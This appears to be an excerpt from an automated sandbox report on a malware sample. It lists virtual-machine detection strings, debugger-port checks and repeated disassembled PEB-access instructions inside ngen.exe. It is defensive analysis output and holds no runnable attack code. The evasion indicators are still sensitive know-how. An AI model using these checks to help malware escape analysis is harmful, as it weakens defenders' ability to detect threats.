            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092344408.0000000001392000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2133124462.000002AF1A6DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.9.drBinary or memory string: vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS$w
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.9.drBinary or memory string: VMware20,1
            Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD1C0 rdtsc 5_2_057AD1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00417363 LdrLoadDll,5_2_00417363
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576B570 mov eax, dword ptr fs:[00000030h]5_2_0576B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576B570 mov eax, dword ptr fs:[00000030h]5_2_0576B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B562 mov eax, dword ptr fs:[00000030h]5_2_0572B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576656A mov eax, dword ptr fs:[00000030h]5_2_0576656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576656A mov eax, dword ptr fs:[00000030h]5_2_0576656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576656A mov eax, dword ptr fs:[00000030h]5_2_0576656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05738550 mov eax, dword ptr fs:[00000030h]5_2_05738550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05738550 mov eax, dword ptr fs:[00000030h]5_2_05738550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740535 mov eax, dword ptr fs:[00000030h]5_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740535 mov eax, dword ptr fs:[00000030h]5_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740535 mov eax, dword ptr fs:[00000030h]5_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740535 mov eax, dword ptr fs:[00000030h]5_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740535 mov eax, dword ptr fs:[00000030h]5_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05740535 mov eax, dword ptr fs:[00000030h]5_2_05740535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576D530 mov eax, dword ptr fs:[00000030h]5_2_0576D530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576D530 mov eax, dword ptr fs:[00000030h]5_2_0576D530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D534 mov eax, dword ptr fs:[00000030h]5_2_0573D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D534 mov eax, dword ptr fs:[00000030h]5_2_0573D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D534 mov eax, dword ptr fs:[00000030h]5_2_0573D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D534 mov eax, dword ptr fs:[00000030h]5_2_0573D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D534 mov eax, dword ptr fs:[00000030h]5_2_0573D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D534 mov eax, dword ptr fs:[00000030h]5_2_0573D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058055C9 mov eax, dword ptr fs:[00000030h]5_2_058055C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E53E mov eax, dword ptr fs:[00000030h]5_2_0575E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E53E mov eax, dword ptr fs:[00000030h]5_2_0575E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E53E mov eax, dword ptr fs:[00000030h]5_2_0575E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E53E mov eax, dword ptr fs:[00000030h]5_2_0575E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E53E mov eax, dword ptr fs:[00000030h]5_2_0575E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EB52F mov eax, dword ptr fs:[00000030h]5_2_057EB52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058035D7 mov eax, dword ptr fs:[00000030h]5_2_058035D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058035D7 mov eax, dword ptr fs:[00000030h]5_2_058035D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058035D7 mov eax, dword ptr fs:[00000030h]5_2_058035D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057DF525 mov eax, dword ptr fs:[00000030h]5_2_057DF525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05767505 mov eax, dword ptr fs:[00000030h]5_2_05767505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05767505 mov ecx, dword ptr fs:[00000030h]5_2_05767505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05804500 mov eax, dword ptr fs:[00000030h]5_2_05804500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515F4 mov eax, dword ptr fs:[00000030h]5_2_057515F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515F4 mov eax, dword ptr fs:[00000030h]5_2_057515F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515F4 mov eax, dword ptr fs:[00000030h]5_2_057515F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515F4 mov eax, dword ptr fs:[00000030h]5_2_057515F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515F4 mov eax, dword ptr fs:[00000030h]5_2_057515F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515F4 mov eax, dword ptr fs:[00000030h]5_2_057515F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575E5E7 mov eax, dword ptr fs:[00000030h]5_2_0575E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057325E0 mov eax, dword ptr fs:[00000030h]5_2_057325E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C5ED mov eax, dword ptr fs:[00000030h]5_2_0576C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576C5ED mov eax, dword ptr fs:[00000030h]5_2_0576C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057365D0 mov eax, dword ptr fs:[00000030h]5_2_057365D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A5D0 mov eax, dword ptr fs:[00000030h]5_2_0576A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A5D0 mov eax, dword ptr fs:[00000030h]5_2_0576A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD5D0 mov eax, dword ptr fs:[00000030h]5_2_057AD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AD5D0 mov ecx, dword ptr fs:[00000030h]5_2_057AD5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057595DA mov eax, dword ptr fs:[00000030h]5_2_057595DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057655C0 mov eax, dword ptr fs:[00000030h]5_2_057655C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05805537 mov eax, dword ptr fs:[00000030h]5_2_05805537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E5CF mov eax, dword ptr fs:[00000030h]5_2_0576E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E5CF mov eax, dword ptr fs:[00000030h]5_2_0576E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF5BE mov eax, dword ptr fs:[00000030h]5_2_057EF5BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057545B1 mov eax, dword ptr fs:[00000030h]5_2_057545B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057545B1 mov eax, dword ptr fs:[00000030h]5_2_057545B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575F5B0 mov eax, dword ptr fs:[00000030h]5_2_0575F5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C35BA mov eax, dword ptr fs:[00000030h]5_2_057C35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C35BA mov eax, dword ptr fs:[00000030h]5_2_057C35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C35BA mov eax, dword ptr fs:[00000030h]5_2_057C35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057C35BA mov eax, dword ptr fs:[00000030h]5_2_057C35BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B05A7 mov eax, dword ptr fs:[00000030h]5_2_057B05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B05A7 mov eax, dword ptr fs:[00000030h]5_2_057B05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B05A7 mov eax, dword ptr fs:[00000030h]5_2_057B05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515A9 mov eax, dword ptr fs:[00000030h]5_2_057515A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515A9 mov eax, dword ptr fs:[00000030h]5_2_057515A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515A9 mov eax, dword ptr fs:[00000030h]5_2_057515A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515A9 mov eax, dword ptr fs:[00000030h]5_2_057515A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057515A9 mov eax, dword ptr fs:[00000030h]5_2_057515A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E59C mov eax, dword ptr fs:[00000030h]5_2_0576E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BB594 mov eax, dword ptr fs:[00000030h]5_2_057BB594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BB594 mov eax, dword ptr fs:[00000030h]5_2_057BB594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05732582 mov eax, dword ptr fs:[00000030h]5_2_05732582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05732582 mov ecx, dword ptr fs:[00000030h]5_2_05732582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572758F mov eax, dword ptr fs:[00000030h]5_2_0572758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572758F mov eax, dword ptr fs:[00000030h]5_2_0572758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572758F mov eax, dword ptr fs:[00000030h]5_2_0572758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05764588 mov eax, dword ptr fs:[00000030h]5_2_05764588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575A470 mov eax, dword ptr fs:[00000030h]5_2_0575A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575A470 mov eax, dword ptr fs:[00000030h]5_2_0575A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575A470 mov eax, dword ptr fs:[00000030h]5_2_0575A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731460 mov eax, dword ptr fs:[00000030h]5_2_05731460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731460 mov eax, dword ptr fs:[00000030h]5_2_05731460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731460 mov eax, dword ptr fs:[00000030h]5_2_05731460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731460 mov eax, dword ptr fs:[00000030h]5_2_05731460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05731460 mov eax, dword ptr fs:[00000030h]5_2_05731460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F460 mov eax, dword ptr fs:[00000030h]5_2_0574F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F460 mov eax, dword ptr fs:[00000030h]5_2_0574F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F460 mov eax, dword ptr fs:[00000030h]5_2_0574F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F460 mov eax, dword ptr fs:[00000030h]5_2_0574F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F460 mov eax, dword ptr fs:[00000030h]5_2_0574F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574F460 mov eax, dword ptr fs:[00000030h]5_2_0574F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF453 mov eax, dword ptr fs:[00000030h]5_2_057EF453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572645D mov eax, dword ptr fs:[00000030h]5_2_0572645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575245A mov eax, dword ptr fs:[00000030h]5_2_0575245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B440 mov eax, dword ptr fs:[00000030h]5_2_0573B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B440 mov eax, dword ptr fs:[00000030h]5_2_0573B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B440 mov eax, dword ptr fs:[00000030h]5_2_0573B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B440 mov eax, dword ptr fs:[00000030h]5_2_0573B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B440 mov eax, dword ptr fs:[00000030h]5_2_0573B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573B440 mov eax, dword ptr fs:[00000030h]5_2_0573B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576E443 mov eax, dword ptr fs:[00000030h]5_2_0576E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572E420 mov eax, dword ptr fs:[00000030h]5_2_0572E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572E420 mov eax, dword ptr fs:[00000030h]5_2_0572E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572E420 mov eax, dword ptr fs:[00000030h]5_2_0572E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572C427 mov eax, dword ptr fs:[00000030h]5_2_0572C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_058054DB mov eax, dword ptr fs:[00000030h]5_2_058054DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05768402 mov eax, dword ptr fs:[00000030h]5_2_05768402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05768402 mov eax, dword ptr fs:[00000030h]5_2_05768402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05768402 mov eax, dword ptr fs:[00000030h]5_2_05768402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575340D mov eax, dword ptr fs:[00000030h]5_2_0575340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057304E5 mov ecx, dword ptr fs:[00000030h]5_2_057304E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057D94E0 mov eax, dword ptr fs:[00000030h]5_2_057D94E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057634B0 mov eax, dword ptr fs:[00000030h]5_2_057634B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057644B0 mov ecx, dword ptr fs:[00000030h]5_2_057644B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BA4B0 mov eax, dword ptr fs:[00000030h]5_2_057BA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057364AB mov eax, dword ptr fs:[00000030h]5_2_057364AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572B480 mov eax, dword ptr fs:[00000030h]5_2_0572B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05739486 mov eax, dword ptr fs:[00000030h]5_2_05739486
